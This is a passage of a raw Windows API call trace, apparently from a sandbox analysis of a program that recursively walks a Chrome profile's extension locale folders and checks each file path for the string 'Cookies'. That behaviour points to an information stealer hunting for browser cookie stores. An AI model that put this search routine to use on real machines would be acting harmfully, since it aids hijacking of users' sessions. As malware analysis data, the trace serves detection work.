lstrlenW (lpString="\\") returned 1 [0163.372] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.372] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.372] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.372] lstrlenW (lpString="ru") returned 2 [0163.372] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.372] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" [0163.372] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" [0163.372] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*.*" [0163.372] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.373] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.373] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.373] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.373] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.373] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.373] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned 137 [0163.373] lstrlenW (lpString="\\") returned 1 [0163.373] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" [0163.373] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\" [0163.373] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\") returned 138 [0163.373] lstrlenW (lpString="messages.json") returned 13 [0163.373] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\" [0163.373] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" [0163.373] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json", lpSrch="Cookies") returned 0x0 [0163.374] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.374] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.374] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="sk", cAlternateFileName="")) returned 1 [0163.374] lstrcmpiW (lpString1="sk", lpString2=".") returned 1 [0163.374] lstrcmpiW (lpString1="sk", lpString2="..") returned 1 [0163.374] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.374] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.374] lstrlenW (lpString="\\") returned 1 [0163.374] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.374] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.374] lstrlenW (lpString="sk") returned 2 [0163.374] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" [0163.374] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" [0163.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*.*" [0163.375] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.375] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.375] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.375] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.375] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.375] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.375] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned 137 [0163.375] lstrlenW (lpString="\\") returned 1 [0163.375] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" [0163.375] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\" [0163.375] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\") returned 138 [0163.375] lstrlenW (lpString="messages.json") returned 13 [0163.375] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\" [0163.375] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" [0163.376] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json", lpSrch="Cookies") returned 0x0 [0163.376] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.376] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.376] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="sl", cAlternateFileName="")) returned 1 [0163.376] lstrcmpiW (lpString1="sl", lpString2=".") returned 1 [0163.376] lstrcmpiW (lpString1="sl", lpString2="..") returned 1 [0163.376] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.376] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.376] lstrlenW (lpString="\\") returned 1 [0163.376] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.376] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.376] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.376] lstrlenW (lpString="sl") returned 2 [0163.376] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.376] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" [0163.376] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" [0163.376] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*.*" [0163.376] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, 